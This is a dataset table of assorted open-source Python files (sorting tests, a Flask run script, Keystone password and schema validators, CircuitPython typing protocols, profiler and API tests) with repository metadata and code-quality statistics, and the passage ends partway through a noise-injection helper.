hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ed56848f13aa7c115a1dd3cf89a2c4bbc55610b1 | 50 | py | Python | 12_browser_automation_selenium/lectures/3_using_chrome_in_scraping_code/locators/quotes_page_locators.py | gdia/The-Complete-Python-Course | ed375b65242249bc749c3e292a6149f8528b9dcf | [
"MIT"
] | 29 | 2019-09-02T21:15:59.000Z | 2022-01-14T02:20:05.000Z | 12_browser_automation_selenium/lectures/3_using_chrome_in_scraping_code/locators/quotes_page_locators.py | gdia/The-Complete-Python-Course | ed375b65242249bc749c3e292a6149f8528b9dcf | [
"MIT"
] | 2 | 2020-08-20T05:48:36.000Z | 2021-06-02T03:16:31.000Z | 12_browser_automation_selenium/lectures/3_using_chrome_in_scraping_code/locators/quotes_page_locators.py | gdia/The-Complete-Python-Course | ed375b65242249bc749c3e292a6149f8528b9dcf | [
"MIT"
] | 38 | 2019-10-20T14:29:12.000Z | 2022-03-27T19:50:05.000Z | class QuotesPageLocators:
QUOTE = "div.quote"
| 16.666667 | 25 | 0.72 | 5 | 50 | 7.2 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18 | 50 | 2 | 26 | 25 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0.18 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ed598e53274f5dfab3c2f63c4f12119088c2c943 | 178 | py | Python | rses/src/rses_run.py | iScrE4m/RSES | 88299f105ded8838243eab8b25ab1626c97d1179 | [
"MIT"
] | 1 | 2022-02-16T15:06:22.000Z | 2022-02-16T15:06:22.000Z | rses/src/rses_run.py | djetelina/RSES | 88299f105ded8838243eab8b25ab1626c97d1179 | [
"MIT"
] | null | null | null | rses/src/rses_run.py | djetelina/RSES | 88299f105ded8838243eab8b25ab1626c97d1179 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding=utf-8
"""Run - mainly for development"""
from flask_app.app import app
port = app.config['PORT']
app.run(host='0.0.0.0', port=port, debug=True)
| 19.777778 | 46 | 0.685393 | 32 | 178 | 3.78125 | 0.65625 | 0.049587 | 0.049587 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038217 | 0.117978 | 178 | 8 | 47 | 22.25 | 0.732484 | 0.353933 | 0 | 0 | 0 | 0 | 0.101852 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
ed7f4ed9e63c61256ceec81062dedfe58def2269 | 2,418 | py | Python | test/test_algs.py | callamartyn/example | 3839b02a6f36eb6a2f640cbc333fbfd70a235dc6 | [
"Apache-2.0"
] | null | null | null | test/test_algs.py | callamartyn/example | 3839b02a6f36eb6a2f640cbc333fbfd70a235dc6 | [
"Apache-2.0"
] | null | null | null | test/test_algs.py | callamartyn/example | 3839b02a6f36eb6a2f640cbc333fbfd70a235dc6 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from example import algs
def test_pointless_sort():
# generate random vector of length 10
x = np.random.rand(10)
# check that pointless_sort always returns [1,2,3]
assert np.array_equal(algs.pointless_sort(x), np.array([1,2,3]))
# generate a new random vector of length 10
x = np.random.rand(10)
# check that pointless_sort still returns [1,2,3]
assert np.array_equal(algs.pointless_sort(x), np.array([1,2,3]))
def test_bubblesort():
# Actually test bubblesort here. It might be useful to think about
# some edge cases for your code, where it might fail. Some things to
# think about: (1) does your code handle 0-element arrays without
# failing, (2) does your code handle characters?
x = np.array([1,2,4,0,1])
empty = []
single = [11]
dup = [3, 12, 7, 7, -6, 9]
odd = np.random.rand(11)
even = np.random.rand(12)
# for now, just attempt to call the bubblesort function, should
# actually check output
#algs.bubblesort(x)
# test that bubblesort is sorting array x correctly
assert np.array_equal(algs.bubblesort(x), [0,1,1,2,4])
# testing additional edge cases; empty, single element, duplicated
# element, odd and even length vectors
assert np.array_equal(algs.bubblesort(empty), [])
assert np.array_equal(algs.bubblesort(single), [11])
assert np.array_equal(algs.bubblesort(dup), [-6, 3, 7, 7, 9, 12])
algs.bubblesort(odd)
assert odd[0] < odd[10]
algs.bubblesort(even)
assert even[0] < even[11]
def test_quicksort():
x = np.array([1,2,4,0,1])
empty = []
single = [11]
dup = [3, 12, 7, 7, -6, 9]
odd = np.random.rand(11)
even = np.random.rand(12)
# for now, just attempt to call the quicksort function, should
# actually check output
#algs.quicksort(x)
# testing the quicksort is sorting array x correctly
assert np.array_equal(algs.quicksort(x), [0,1,1,2,4])
# testing additional edge cases; empty, single element, duplicated
# element, odd and even length vectors
assert np.array_equal(algs.quicksort(x), [0,1,1,2,4])
assert np.array_equal(algs.quicksort(empty), [])
assert np.array_equal(algs.quicksort(single), [11])
assert np.array_equal(algs.quicksort(dup), [-6, 3, 7, 7, 9, 12])
algs.quicksort(odd)
assert odd[0] < odd[10]
algs.quicksort(even)
assert even[0] < even[11]
| 35.558824 | 72 | 0.661704 | 384 | 2,418 | 4.117188 | 0.226563 | 0.066414 | 0.090449 | 0.125237 | 0.73055 | 0.73055 | 0.56673 | 0.500949 | 0.483238 | 0.483238 | 0 | 0.054422 | 0.209677 | 2,418 | 67 | 73 | 36.089552 | 0.772894 | 0.382134 | 0 | 0.578947 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.394737 | 1 | 0.078947 | false | 0 | 0.052632 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
ed82bb73befae9372960fba0bef92122abe39592 | 2,714 | py | Python | fabio/test/test_all.py | picca/fabio | bc3aae330bef6e1c983007562157edfe6d7daf91 | [
"Apache-2.0"
] | null | null | null | fabio/test/test_all.py | picca/fabio | bc3aae330bef6e1c983007562157edfe6d7daf91 | [
"Apache-2.0"
] | 2 | 2019-04-24T13:43:41.000Z | 2019-06-13T08:54:02.000Z | fabio/test/test_all.py | boesecke/fabio | 11350e445a6def4d02c6860aea3ae7f36652af6a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Project: Fable Input Output
# https://github.com/silx-kit/fabio
#
# Copyright (C) European Synchrotron Radiation Facility, Grenoble, France
#
# Principal author: Jérôme Kieffer (Jerome.Kieffer@ESRF.eu)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Test suite for all fabio modules."""
from __future__ import print_function, with_statement, division, absolute_import
import sys
import logging
import unittest
logger = logging.getLogger(__name__)
from . import testfabioimage
from . import testfilenames
from . import test_file_series
from . import test_filename_steps
from . import testheadernotsingleton
from . import testopenheader
from . import testopenimage
from . import test_flat_binary
from . import testcompression
from . import test_nexus
from . import testfabioconvert
from . import test_failing_files
from . import test_formats
from . import test_image_convert
from . import test_tiffio
from . import test_frames
from . import test_fabio
from . import codecs
def suite():
testSuite = unittest.TestSuite()
testSuite.addTest(testfabioimage.suite())
testSuite.addTest(testfilenames.suite())
testSuite.addTest(test_file_series.suite())
testSuite.addTest(test_filename_steps.suite())
testSuite.addTest(testheadernotsingleton.suite())
testSuite.addTest(testopenheader.suite())
testSuite.addTest(testopenimage.suite())
testSuite.addTest(test_flat_binary.suite())
testSuite.addTest(testcompression.suite())
testSuite.addTest(test_nexus.suite())
testSuite.addTest(testfabioconvert.suite())
testSuite.addTest(test_failing_files.suite())
testSuite.addTest(test_formats.suite())
testSuite.addTest(test_image_convert.suite())
testSuite.addTest(test_tiffio.suite())
testSuite.addTest(test_frames.suite())
testSuite.addTest(test_fabio.suite())
testSuite.addTest(codecs.suite())
return testSuite
if __name__ == '__main__':
runner = unittest.TextTestRunner()
if not runner.run(suite()).wasSuccessful():
sys.exit(1)
| 33.506173 | 80 | 0.74871 | 341 | 2,714 | 5.815249 | 0.434018 | 0.090772 | 0.18003 | 0.126072 | 0.041351 | 0.02824 | 0 | 0 | 0 | 0 | 0 | 0.001318 | 0.161385 | 2,714 | 80 | 81 | 33.925 | 0.869947 | 0.34451 | 0 | 0 | 0 | 0 | 0.004569 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020833 | false | 0 | 0.458333 | 0 | 0.5 | 0.020833 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
9c03d66e8f725e071dd1e5243b347ebe367f8149 | 1,806 | py | Python | circuitpython_typing/__init__.py | prplz/Adafruit_CircuitPython_Typing | 60e53466be69048f28bfc51ae28cbf77b0447db5 | [
"MIT"
] | null | null | null | circuitpython_typing/__init__.py | prplz/Adafruit_CircuitPython_Typing | 60e53466be69048f28bfc51ae28cbf77b0447db5 | [
"MIT"
] | null | null | null | circuitpython_typing/__init__.py | prplz/Adafruit_CircuitPython_Typing | 60e53466be69048f28bfc51ae28cbf77b0447db5 | [
"MIT"
] | null | null | null | # SPDX-FileCopyrightText: Copyright (c) 2022 Dan Halbert for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`circuitpython_typing`
================================================================================
Types needed for type annotation that are not in `typing`
* Author(s): Alec Delaney, Dan Halbert, Randy Hudson
"""
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_Typing.git"
from typing import Union, Optional
# Protocol was introduced in Python 3.8.
try:
from typing import Protocol
except ImportError:
from typing_extensions import Protocol
from array import array
ReadableBuffer = Union[bytes, bytearray, memoryview, array]
"""Classes that implement the readable buffer protocol
* `bytes`
* `bytearray`
* `memoryview`
* `array.array`
"""
WriteableBuffer = Union[bytearray, memoryview, array]
"""Classes that implement the writeable buffer protocol
* `bytearray`
* `memoryview`
* `array.array`
"""
class ByteStream(Protocol):
"""Protocol for basic I/O operations on a byte stream.
Classes which implement this protocol include
* `io.BytesIO`
* `io.FileIO` (for a file open in binary mode)
* `busio.UART`
* `usb_cdc.Serial`
"""
# Should be `, /)`, but not available in Python 3.7.
def read(self, count: Optional[int] = None) -> Optional[bytes]:
"""Read ``count`` bytes from the stream.
If ``count`` bytes are not immediately available,
or if the parameter is not specified in the call,
the outcome is implementation-dependent.
"""
...
# Should be `, /)`, but not available in Python 3.7.
def write(self, buf: ReadableBuffer) -> Optional[int]:
"""Write the bytes in ``buf`` to the stream."""
...
| 27.363636 | 80 | 0.645626 | 216 | 1,806 | 5.337963 | 0.518519 | 0.065915 | 0.083261 | 0.050304 | 0.143972 | 0.143972 | 0.143972 | 0.062446 | 0.062446 | 0.062446 | 0 | 0.009689 | 0.199889 | 1,806 | 65 | 81 | 27.784615 | 0.788235 | 0.488372 | 0 | 0.133333 | 0 | 0 | 0.120264 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.333333 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
9c169076a43064b08562fa985dd24a69da259afb | 793 | py | Python | cterasdk/core/files/fetch_resources_param.py | CTERA-Networks/ctera-python-sdk | 35d9cb6949590e664fd237d29f54ce054fe80a9e | [
"Apache-2.0"
] | 5 | 2020-02-25T22:34:48.000Z | 2020-02-29T22:56:39.000Z | cterasdk/core/files/fetch_resources_param.py | ctera/ctera-python-sdk | a86cb575d538620a12f326fe5e92f5abb5cc1f6b | [
"Apache-2.0"
] | 16 | 2020-03-25T19:12:03.000Z | 2021-06-02T14:45:34.000Z | cterasdk/core/files/fetch_resources_param.py | ctera/ctera-python-sdk | a86cb575d538620a12f326fe5e92f5abb5cc1f6b | [
"Apache-2.0"
] | 3 | 2020-10-22T18:22:06.000Z | 2021-10-03T18:38:41.000Z | from ...common import Object
class FetchResourcesParam(Object):
def __init__(self):
self._classname = 'FetchResourcesParam'
self.start = 0
self.limit = 100
def increment(self):
self.start = self.start + self.limit
class FetchResourcesParamBuilder:
def __init__(self):
self.param = FetchResourcesParam()
def root(self, root):
self.param.root = root # pylint: disable=attribute-defined-outside-init
return self
def depth(self, depth):
self.param.depth = depth # pylint: disable=attribute-defined-outside-init
return self
def include_deleted(self):
self.param.includeDeleted = True # pylint: disable=attribute-defined-outside-init
def build(self):
return self.param
| 24.030303 | 90 | 0.659521 | 88 | 793 | 5.829545 | 0.340909 | 0.087719 | 0.128655 | 0.169591 | 0.2846 | 0.2846 | 0.206628 | 0.206628 | 0.206628 | 0 | 0 | 0.006689 | 0.245902 | 793 | 32 | 91 | 24.78125 | 0.851171 | 0.176545 | 0 | 0.190476 | 0 | 0 | 0.029276 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.047619 | 0.047619 | 0.619048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
9c20eb888717cc0bbf1a9464fad1caf9382e8828 | 2,567 | py | Python | test/test_cmdline_main.py | sthagen/pyinstrument | 7b52e037bc3b5736037171003ef3318938e081fe | [
"BSD-3-Clause"
] | 1 | 2020-12-13T06:22:51.000Z | 2020-12-13T06:22:51.000Z | test/test_cmdline_main.py | sthagen/pyinstrument | 7b52e037bc3b5736037171003ef3318938e081fe | [
"BSD-3-Clause"
] | null | null | null | test/test_cmdline_main.py | sthagen/pyinstrument | 7b52e037bc3b5736037171003ef3318938e081fe | [
"BSD-3-Clause"
] | null | null | null | from pathlib import Path
import pytest
from pyinstrument.__main__ import main
from pyinstrument.renderers.base import FrameRenderer
from .util import BUSY_WAIT_SCRIPT
fake_renderer_instance = None
class FakeRenderer(FrameRenderer):
def __init__(self, time=None, **kwargs):
self.time = time
super().__init__(**kwargs)
global fake_renderer_instance
fake_renderer_instance = self
print("instance")
def default_processors(self):
"""
Return a list of processors that this renderer uses by default.
"""
return []
def render(self, session) -> str:
return ""
def test_renderer_option(monkeypatch: pytest.MonkeyPatch, tmp_path: Path):
(tmp_path / "test_program.py").write_text(BUSY_WAIT_SCRIPT)
monkeypatch.setattr(
"sys.argv",
[
"pyinstrument",
"-r",
"test.test_cmdline_main.FakeRenderer",
"-p",
"time=percent_of_total",
"test_program.py",
],
)
monkeypatch.chdir(tmp_path)
global fake_renderer_instance
fake_renderer_instance = None
main()
assert fake_renderer_instance is not None
assert fake_renderer_instance.time == "percent_of_total"
def test_json_renderer_option(monkeypatch: pytest.MonkeyPatch, tmp_path: Path):
(tmp_path / "test_program.py").write_text(BUSY_WAIT_SCRIPT)
monkeypatch.setattr(
"sys.argv",
[
"pyinstrument",
"-r",
"test.test_cmdline_main.FakeRenderer",
"-p",
'processor_options={"some_option": 44}',
"test_program.py",
],
)
monkeypatch.chdir(tmp_path)
global fake_renderer_instance
fake_renderer_instance = None
main()
assert fake_renderer_instance is not None
assert fake_renderer_instance.processor_options["some_option"] == 44
def test_dotted_renderer_option(monkeypatch: pytest.MonkeyPatch, tmp_path: Path):
(tmp_path / "test_program.py").write_text(BUSY_WAIT_SCRIPT)
monkeypatch.setattr(
"sys.argv",
[
"pyinstrument",
"-r",
"test.test_cmdline_main.FakeRenderer",
"-p",
"processor_options.other_option=13",
"test_program.py",
],
)
monkeypatch.chdir(tmp_path)
global fake_renderer_instance
fake_renderer_instance = None
main()
assert fake_renderer_instance is not None
assert fake_renderer_instance.processor_options["other_option"] == 13
| 25.415842 | 81 | 0.641215 | 281 | 2,567 | 5.519573 | 0.245552 | 0.116054 | 0.193424 | 0.10058 | 0.716312 | 0.684075 | 0.684075 | 0.654417 | 0.654417 | 0.654417 | 0 | 0.004235 | 0.264122 | 2,567 | 100 | 82 | 25.67 | 0.816834 | 0.024542 | 0 | 0.594595 | 0 | 0 | 0.163306 | 0.077419 | 0 | 0 | 0 | 0 | 0.081081 | 1 | 0.081081 | false | 0 | 0.067568 | 0.013514 | 0.189189 | 0.013514 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
9c278b019d78eb629e38b184160809bb707d7fcd | 3,872 | py | Python | keystone/common/validation/validators.py | ferag/keystone | af1c1a822a8dfdd543c6e4d48264f5b8be2bdfc7 | [
"Apache-2.0"
] | null | null | null | keystone/common/validation/validators.py | ferag/keystone | af1c1a822a8dfdd543c6e4d48264f5b8be2bdfc7 | [
"Apache-2.0"
] | null | null | null | keystone/common/validation/validators.py | ferag/keystone | af1c1a822a8dfdd543c6e4d48264f5b8be2bdfc7 | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Internal implementation of request body validating middleware."""
import re
import jsonschema
from oslo_config import cfg
from oslo_log import log
import six
from keystone import exception
from keystone.i18n import _
CONF = cfg.CONF
LOG = log.getLogger(__name__)
# TODO(rderose): extend schema validation and add this check there
def validate_password(password):
pattern = CONF.security_compliance.password_regex
if pattern:
if not isinstance(password, six.string_types):
detail = _("Password must be a string type")
raise exception.PasswordValidationError(detail=detail)
try:
if not re.match(pattern, password):
pattern_desc = (
CONF.security_compliance.password_regex_description)
raise exception.PasswordRequirementsValidationError(
detail=pattern_desc)
except re.error:
msg = ("Unable to validate password due to invalid regular "
"expression - password_regex: %s")
LOG.error(msg, pattern)
detail = _("Unable to validate password due to invalid "
"configuration")
raise exception.PasswordValidationError(detail=detail)
class SchemaValidator(object):
"""Resource reference validator class."""
validator_org = jsonschema.Draft4Validator
def __init__(self, schema):
# NOTE(lbragstad): If at some point in the future we want to extend
# our validators to include something specific we need to check for,
# we can do it here. Nova's V3 API validators extend the validator to
# include `self._validate_minimum` and `self._validate_maximum`. This
# would be handy if we needed to check for something the jsonschema
# didn't by default. See the Nova V3 validator for details on how this
# is done.
validators = {}
validator_cls = jsonschema.validators.extend(self.validator_org,
validators)
fc = jsonschema.FormatChecker()
self.validator = validator_cls(schema, format_checker=fc)
def validate(self, *args, **kwargs):
try:
self.validator.validate(*args, **kwargs)
except jsonschema.ValidationError as ex:
# NOTE: For whole OpenStack message consistency, this error
# message has been written in a format consistent with WSME.
if ex.path:
# NOTE(lbragstad): Here we could think about using iter_errors
# as a method of providing invalid parameters back to the
# user.
# TODO(lbragstad): If the value of a field is confidential or
# too long, then we should build the masking in here so that
# we don't expose sensitive user information in the event it
# fails validation.
path = '/'.join(map(six.text_type, ex.path))
detail = _("Invalid input for field '%(path)s': "
"%(message)s") % {'path': path,
'message': six.text_type(ex)}
else:
detail = six.text_type(ex)
raise exception.SchemaValidationError(detail=detail)
| 42.549451 | 78 | 0.637397 | 460 | 3,872 | 5.284783 | 0.456522 | 0.024681 | 0.013575 | 0.016043 | 0.098725 | 0.029617 | 0.029617 | 0 | 0 | 0 | 0 | 0.003289 | 0.293388 | 3,872 | 90 | 79 | 43.022222 | 0.885234 | 0.395403 | 0 | 0.083333 | 0 | 0 | 0.098567 | 0 | 0 | 0 | 0 | 0.011111 | 0 | 1 | 0.0625 | false | 0.25 | 0.145833 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
9c29fa5ae6dc8e215fc840e798a614af93b08c37 | 1,362 | py | Python | tests/test_basic.py | supwest/stockfighter | 57bbe94061518ae85ecbab50c847bd6926504cb7 | [
"MIT"
] | null | null | null | tests/test_basic.py | supwest/stockfighter | 57bbe94061518ae85ecbab50c847bd6926504cb7 | [
"MIT"
] | null | null | null | tests/test_basic.py | supwest/stockfighter | 57bbe94061518ae85ecbab50c847bd6926504cb7 | [
"MIT"
] | null | null | null | import unittest
import os
from .context import stockfighter
from stockfighter import trader
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class StockfighterAPITest(unittest.TestCase):
def setUp(self):
self.test_trader = stockfighter.trader.Trader()
def test_trader_driver_is_firefox(self):
self.assertEqual(self.test_trader.driver.name, "firefox")
def test_trader_checks_page_request_return_code(self):
status = self.test_trader._check_page_status('https://www.stockfighter.io/')
self.assertIn(status, [True, False])
def test_trader_gets_page(self):
self.test_trader.driver.get('https://www.stockfighter.io/')
self.assertIn("Stockfighter", self.test_trader.driver.title)
def test_trader_checks_api_is_up(self):
response = self.test_trader._check_api_status()
self.assertIn(response, [True, False])
def test_trader_logs_in(self):
self.test_trader._login()
self.assertEqual('https://www.stockfighter.io/ui/account', self.test_trader.driver.current_url)
def test_trader_gets_trading_account(self):
self.test_trader._get_trading_account("Chock A Block")
self.assertEquals(self.test_trader.account, "MSB81053722")
def tearDown(self):
self.test_trader.driver.close()
| 33.219512 | 103 | 0.72467 | 174 | 1,362 | 5.402299 | 0.327586 | 0.180851 | 0.16383 | 0.095745 | 0.170213 | 0.07234 | 0 | 0 | 0 | 0 | 0 | 0.007098 | 0.17254 | 1,362 | 40 | 104 | 34.05 | 0.826974 | 0 | 0 | 0 | 0 | 0 | 0.100587 | 0 | 0 | 0 | 0 | 0 | 0.214286 | 1 | 0.285714 | false | 0 | 0.214286 | 0 | 0.535714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
9c3ceef3f0dfd436a5b1789bb937b4fbcbbbae90 | 7,564 | py | Python | candle/noise_utils.py | hyoo/candle_lib | 33fe91879a09035fab1b94361c0d65d4595e8d0d | [
"MIT"
] | null | null | null | candle/noise_utils.py | hyoo/candle_lib | 33fe91879a09035fab1b94361c0d65d4595e8d0d | [
"MIT"
] | null | null | null | candle/noise_utils.py | hyoo/candle_lib | 33fe91879a09035fab1b94361c0d65d4595e8d0d | [
"MIT"
] | null | null | null | import random
import numpy as np
def add_noise_new(data, labels, params):
# new refactoring of the noise injection methods
# noise_mode sets the pattern of the noise injection
# cluster: apply to the samples and features defined by noise_samples and noise_features
# conditional : apply to features conditional on a threshold
#
# noise_type sets the form of the noise
# gaussian: Gaussian feature noise with noise_scale as std_dev
# uniform: Uniformly distributed noise on the interval [-noise_scale, noise_scale]
# label: Flip labels
if params["noise_injection"]:
if params["label_noise"]:
# check if we want noise correlated with a feature
if params["noise_correlated"]:
labels, y_noise_gen = label_flip_correlated(
labels,
params["label_noise"],
data,
params["feature_col"],
params["feature_threshold"],
)
# else add uncorrelated noise
else:
